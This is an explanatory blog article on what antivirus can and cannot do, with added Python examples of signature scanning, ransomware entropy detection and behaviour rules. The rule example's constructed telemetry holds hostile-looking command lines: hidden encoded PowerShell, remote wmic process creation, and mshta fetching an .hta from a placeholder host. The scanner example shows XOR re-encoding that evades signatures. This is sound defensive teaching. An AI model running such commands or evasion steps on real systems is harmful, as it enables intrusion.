ANTIVIRUS TODAY: WHAT WORKS, WHAT DOESN’T, AND WHEN YOU NEED IT

In 2025, cyber threats remain pervasive and increasingly sophisticated. More than 500,000 new malware samples are discovered each day, including ransomware, trojans, credential stealers, and cryptominers. For many attacks, the first point of contact is still individual endpoints: laptops, desktops, and mobile devices used by employees and individuals.


These figures show that endpoint protection, commonly called antivirus, remains relevant even as the threat landscape evolves. This article examines what antivirus can and cannot do today, where it remains effective, where it struggles, and how individuals and small organisations should think about it within a broader security strategy.



Understanding Modern Antivirus

Early antivirus products relied on malware signatures, distinctive code patterns used to recognise known threats. If a file matched a signature, it was blocked. This approach was effective in an era of widely reused threats.


Modern malware has changed the rules. Many attacks now operate entirely in memory without leaving files, abuse legitimate system tools such as PowerShell or remote administration utilities, or generate unique variants designed to evade static detection.
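The two preceding paragraphs describe signature matching and why unique variants defeat it. The following added example (not code from the article or from any antivirus vendor) shows a minimal scanner with a hash signature and a byte-pattern signature, then scans two constructed variants of the same sample: one with a single padding byte changed, and one with its bytes re-encoded. All samples and signature names are constructed placeholders, not real malware.

```python
"""Added example: a minimal signature scanner and why small changes evade it."""
import hashlib

# Constructed "known bad" sample: an arbitrary byte string standing in for a file.
KNOWN_SAMPLE = b"MZ\x90\x00" + b"payload-stub-v1" + b"\x00" * 16 + b"END"

# Constructed signature database. A hash signature identifies one exact file;
# a byte-pattern signature identifies any file containing a distinctive byte run.
HASH_SIGNATURES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Trojan.Constructed.A"}
PATTERN_SIGNATURES = {b"payload-stub-v1": "Trojan.Constructed.A"}


def scan(data: bytes) -> list:
    """Return the names of every signature that matches `data`, prefixed by type."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        hits.append("hash:" + HASH_SIGNATURES[digest])
    for pattern, name in PATTERN_SIGNATURES.items():
        if pattern in data:
            hits.append("pattern:" + name)
    return hits


def variant_with_padding_change(sample: bytes) -> bytes:
    """Constructed variant: one padding byte changed, functional bytes untouched.

    The whole-file hash no longer matches, but the byte pattern still does.
    """
    return sample[:-4] + b"\x01" + sample[-3:]


def variant_re_encoded(sample: bytes, key: int) -> bytes:
    """Constructed variant: every byte re-encoded with a one-byte XOR key.

    Neither the hash nor the byte pattern survives, which is why scanners added
    behavioural and reputation layers on top of static signatures.
    """
    return bytes(b ^ key for b in sample)


if __name__ == "__main__":
    print("original:        ", scan(KNOWN_SAMPLE))
    print("padding changed: ", scan(variant_with_padding_change(KNOWN_SAMPLE)))
    print("re-encoded:      ", scan(variant_re_encoded(KNOWN_SAMPLE, 0x5A)))
```

The padding-change case is why vendors prefer byte-pattern and fuzzy signatures over plain hashes; the re-encoded case is why even those are insufficient on their own.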


In response, antivirus software has evolved into broader endpoint protection. Modern solutions combine multiple detection techniques, including signature scanning, behavioural analysis, cloud reputation intelligence, exploit mitigation, and ransomware controls. Business versions often add centralised monitoring and alerting. This evolution enables antivirus to reduce exposure and provide insight across endpoints, even though no single control can guarantee complete protection.



Why Endpoint Protection Still Matters

Malware remains widespread, and many devices continue to be exposed to everyday threats. Hundreds of thousands of new samples appear every day, and independent testing consistently shows that leading endpoint protection products block more than 99 percent of widely known threats. Research also indicates that a substantial share of malware infections in small businesses occurs on devices with antivirus installed, suggesting that many infections could have been avoided with updated and properly configured protection.


This matters because the majority of incidents still start with common, opportunistic threats. Someone opens an unsafe attachment, downloads a compromised installer, or clicks a malicious link. In these moments, endpoint protection acts as a safety net. For individuals and small organisations, that safety net remains one of the most cost-effective controls available.


The scale of modern threats helps explain why endpoint protection remains necessary.
Source: Kaspersky Security Bulletin 2025, “The Number of the Year: Kaspersky Detected Half a Million Malicious Files Daily in 2025.”



What Antivirus Still Does Well

Although some discussions suggest antivirus is obsolete, it remains effective in several areas.


Blocking Commodity Malware: Most real-world infections involve known, widely circulating threats. Modern endpoint engines consistently block these threats before they execute, preventing many infections and reducing downtime and recovery costs.


Reducing Routine Exposure: Many compromises stem from default credentials, unpatched software, or careless downloads. Endpoint protection intercepts much of this background noise, lowering the chance that routine errors escalate into incidents.


Basic Ransomware Safeguards: Many products include controls that monitor suspicious encryption behaviour, protect key folders, and provide rollback or recovery options. These features do not stop every ransomware attack, but can significantly reduce its impact.
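The paragraph above mentions products that monitor suspicious encryption behaviour. The following added example (not code from the article or from any product) shows one common heuristic: flag a process that, within a short window, rewrites many files with high-entropy content and changes their extension. The file-write events and the pseudo-random "encrypted" content are constructed inline; the process ids, paths and thresholds are illustrative assumptions.

```python
"""Added example: an entropy-and-rename burst heuristic for ransomware behaviour."""
import hashlib
import math
import os
from collections import Counter, defaultdict, namedtuple

# Constructed file-write event: prev_path is None when a brand-new file is created.
WriteEvent = namedtuple("WriteEvent", "ts pid prev_path path data")


def pseudo_random_bytes(seed: str, n: int) -> bytes:
    """Deterministic high-entropy bytes (a SHA-256 chain) standing in for ciphertext."""
    out, block = b"", seed.encode()
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ~8.0 for encrypted or compressed data, far lower for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def detect_encryption_bursts(events, window=10.0, min_writes=8, entropy_threshold=7.0):
    """Return the set of pids that performed >= min_writes suspicious writes
    inside any `window`-second span. A write is suspicious when it replaces an
    existing file, changes its extension, and its content is high-entropy."""
    recent = defaultdict(list)   # pid -> timestamps of suspicious writes
    flagged = set()
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.prev_path is None:
            continue                                   # new file, not an overwrite
        if os.path.splitext(ev.prev_path)[1] == os.path.splitext(ev.path)[1]:
            continue                                   # extension unchanged
        if shannon_entropy(ev.data) < entropy_threshold:
            continue                                   # plain content, e.g. a text edit
        stamps = recent[ev.pid]
        stamps.append(ev.ts)
        while stamps and stamps[0] < ev.ts - window:   # slide the window forward
            stamps.pop(0)
        if len(stamps) >= min_writes:
            flagged.add(ev.pid)
    return flagged


# Constructed telemetry: three processes with different write patterns.
EVENTS = (
    # pid 4242: rewrites documents as .locked files with ciphertext-like content
    [WriteEvent(100 + i, 4242, f"docs/report{i}.docx", f"docs/report{i}.docx.locked",
                pseudo_random_bytes(f"enc{i}", 2048)) for i in range(12)]
    # pid 2002: a backup tool creating new compressed archives (high entropy, no overwrite)
    + [WriteEvent(100 + i, 2002, None, f"backup/part{i}.zip",
                  pseudo_random_bytes(f"zip{i}", 2048)) for i in range(12)]
    # pid 1001: an editor saving text files in place (same extension, low entropy)
    + [WriteEvent(100 + i, 1001, f"notes/todo{i}.txt", f"notes/todo{i}.txt",
                  b"meeting notes, action items, follow up\n" * 50) for i in range(12)]
)

if __name__ == "__main__":
    print("flagged pids:", detect_encryption_bursts(EVENTS))   # expect {4242}
```

Entropy alone would flag the backup tool, and renames alone would flag ordinary file conversions, which is why the heuristic requires all three conditions together; real products combine this kind of logic with protected folders and decoy files.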


Visibility Across Endpoints: Business-grade solutions provide central dashboards that show blocked threats, alerts, and device status. This visibility helps small teams understand what is happening across their environment and respond more effectively.



Where Antivirus Struggles

Understanding the limitations of antivirus is as important as understanding its strengths.


Fileless and Living-off-the-Land Attacks: Some malware executes entirely in memory or leverages legitimate system tools such as Windows Management Instrumentation (WMI) and macros. Because these behaviours don’t involve obvious malicious files, traditional signature-based scanning may miss them.
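Because living-off-the-land activity leaves no malicious file to hash, modern endpoint products look at process behaviour instead. The following added example (not code from the article or from any product) runs three simple behaviour rules over constructed process-creation telemetry: an Office application spawning a script host, PowerShell launched hidden or with an encoded command, and WMI used to start a process on another host. The events, hostnames and command lines are constructed for illustration and are not captured from a real system.

```python
"""Added example: behaviour rules over process-creation telemetry."""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}

# Constructed telemetry: parent image, child image and command line per event.
EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"id": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <constructed-base64>"},
    {"id": 3, "parent": "services.exe", "image": "svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
    {"id": 4, "parent": "cmd.exe", "image": "wmic.exe",
     "cmd": "wmic.exe /node:FILESRV01 process call create \"cmd.exe /c hostname\""},
    {"id": 5, "parent": "excel.exe", "image": "mshta.exe",
     "cmd": "mshta.exe https://example.invalid/update.hta"},
]


def rule_office_spawns_script_host(ev) -> bool:
    """Documents should not launch interpreters; this catches macro-driven execution."""
    return ev["parent"] in OFFICE_APPS and ev["image"] in SCRIPT_HOSTS


def rule_hidden_or_encoded_powershell(ev) -> bool:
    """Hidden windows and encoded commands are rare in admin use, common in abuse."""
    if ev["image"] not in {"powershell.exe", "pwsh.exe"}:
        return False
    lowered = ev["cmd"].lower()
    markers = ("-encodedcommand", "-enc ", "-windowstyle hidden", "-w hidden")
    return any(m in lowered for m in markers)


def rule_wmi_remote_process_create(ev) -> bool:
    """wmic.exe creating a process on a remote node is a classic lateral-movement signal."""
    lowered = ev["cmd"].lower()
    return ev["image"] == "wmic.exe" and "process call create" in lowered and "/node:" in lowered


RULES = [
    ("office_spawns_script_host", rule_office_spawns_script_host),
    ("hidden_or_encoded_powershell", rule_hidden_or_encoded_powershell),
    ("wmi_remote_process_create", rule_wmi_remote_process_create),
]


def evaluate(events) -> dict:
    """Map each event id to the list of rule names it triggered; silent events are omitted."""
    findings = {}
    for ev in events:
        matched = [name for name, check in RULES if check(ev)]
        if matched:
            findings[ev["id"]] = matched
    return findings


if __name__ == "__main__":
    for event_id, names in evaluate(EVENTS).items():
        print(f"event {event_id}: {', '.join(names)}")
```

Event 1 is the same interpreter as event 2 but launched from the desktop with a script path, so it triggers nothing; the rules key on parent, flags and targets rather than on the binary itself, which is exactly what a file signature cannot see.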


Social Engineering and Identity-Based Attacks: No antivirus product can prevent a user from falling for a convincing phishing email, sharing credentials, or using weak authentication. In many breaches, attackers gain access through stolen credentials rather than malicious files.


Sophisticated Targeted Attacks: When adversaries use custom malware or stolen credentials, signature-based controls offer limited value. Detection depends more on behavioural monitoring, anomaly detection, and human investigation.


Real Incident: The New York Times Breach

A well-documented example of antivirus limitations occurred with the 2013 breach of The New York Times. Attackers maintained access over several months using custom malware variants, and only a small fraction of those variants were detected by the organisation’s antivirus.


The breach was enabled by stolen credentials and evasion techniques that bypassed traditional signature scanning. This case illustrates why modern compromises often require layered detection and response beyond traditional antivirus.



Evaluating Antivirus for Individuals

For personal use, antivirus remains a sensible baseline. Devices used for everyday activities hold valuable information and are routinely targeted by automated threats.


In many cases, built-in protections such as Microsoft Defender provide sufficient baseline coverage when paired with good habits: keeping systems updated, using strong authentication, and avoiding suspicious downloads. Research shows that hygiene and behaviour influence outcomes as much as product choice. An up-to-date engine combined with sensible practices often outperforms a premium product that is poorly maintained.



Antivirus for Small Businesses

Small businesses face a different risk profile. They manage customer data, handle payments, and often lack dedicated security teams. The financial and operational impact of an incident can be significant.


For these organisations, antivirus remains necessary but should be treated as the starting point rather than the complete solution. Effective setups typically include centrally managed endpoint protection, device inventory and monitoring, alert workflows, regular patching, and tested backups. Without visibility and response processes, even good detection can go unused.


Surveys have found that 100% of organisations reporting ransomware incidents were running antivirus at the time, yet the attacks still succeeded.



Antivirus Is One Layer in a Broader Strategy

As organisations grow or handle more sensitive data, security becomes layered by design. Endpoint protection sits alongside identity controls, email filtering, patch management, user awareness training, and reliable backup and recovery processes.


Current attack patterns reinforce this approach. Ransomware continues to affect smaller organisations disproportionately, phishing still drives many breaches, and attackers increasingly misuse legitimate tools. These trends shift attention away from sole reliance on file detection toward identity, behaviours, and resilience.


In this context, antivirus plays a supporting role. It helps reduce everyday noise and blocks common threats, allowing teams to focus on higher-risk activity.



Practical Guidance for Decision-Making

A useful way to think about antivirus is as a baseline safeguard.


For individuals, a reputable solution combined with good digital habits is usually sufficient for everyday risk.


For small businesses, endpoint protection should integrate with central visibility, timely patching, access controls, and backups.


For higher-risk or regulated environments, additional detection and response capabilities may be appropriate.


A simple risk assessment can clarify needs: What data loss would cause material damage? How quickly could the organisation recover from ransomware? Who reviews alerts and investigates suspicious activity? Where those answers are weak, strengthening identity controls and recovery planning often reduces more risk than adding more endpoint features.



Conclusion

Antivirus remains effective at blocking commodity malware, reducing exposure to opportunistic threats, and providing useful visibility across endpoints. It continues to prevent many everyday incidents.


At the same time, modern attacks increasingly target identities, behaviours, and trusted tools, areas that sit partly outside the reach of traditional detection.


For most individuals and small organisations, antivirus remains a practical and cost-effective foundation. Treated as one control among many, it supports a resilient security posture. Understanding what it can and cannot do helps organisations allocate resources wisely and reduce avoidable surprises.


Stay ahead of cyber threats with practical tips, real insights, and expert guidance. Subscribe to the Cyberkach blog or join our newsletter for actionable cybersecurity advice delivered straight to your inbox.